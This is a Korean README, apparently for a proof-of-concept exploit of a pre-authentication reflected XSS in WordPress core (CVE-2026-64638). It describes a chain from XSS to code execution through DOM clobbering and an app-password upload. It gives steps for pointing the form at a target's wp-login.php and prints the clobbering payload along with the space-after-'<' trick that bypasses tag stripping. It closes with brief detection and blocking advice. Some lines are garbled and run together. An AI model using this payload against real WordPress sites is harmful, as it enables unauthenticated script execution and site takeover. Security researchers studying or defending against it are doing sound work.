
WordPress 사전 인증 반사형 XSS(CVE-2026-64638)를 위한 단일 파일 HTML 개념 증명(PoC)으로, 인증되지 않은 JavaScript 실행과 DOM 클로버링(clobbering) 및 앱 비밀번호 업로드를 통한 XSS-to-RCE 체인을 시연합니다.
WordPress 사전 인증 반사형 XSS 개념 증명
WordPress 코어의 CVE-2026-64638(XSS2Shell) 파서 차등 XSS에 대한 단일 파일 HTML 개념 증명입니다. 조작된 로그인 요청을 통해 WordPress 오리진에서 인증되지 않은 JavaScript 실행을 시연합니다.
strip_tags() 대 wp_kses_post())POC.html을 엽니다.action의 http://TARGET/wp-login.php를 대상 URL로 바꿉니다.<form id="poc" method="post" action="http://TARGET/wp-login.php">
confirm()(또는 alert()) 팝업이 실행됩니다.< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=confirm&_envelope=1>
< div id=color-picker class=reset-pass-submit>
< button class="wp-generate-pw color-option">X
각 < 뒤의 공백이 악용 포인트입니다. 공백이 없으면 wp_strip_all_tags()가 전부 제거합니다.
log 필드의 %3C + 공백 패턴을 차단하세요.log에 인코딩된 <가 포함된 POST /wp-login.php 요청을 모니터링하세요.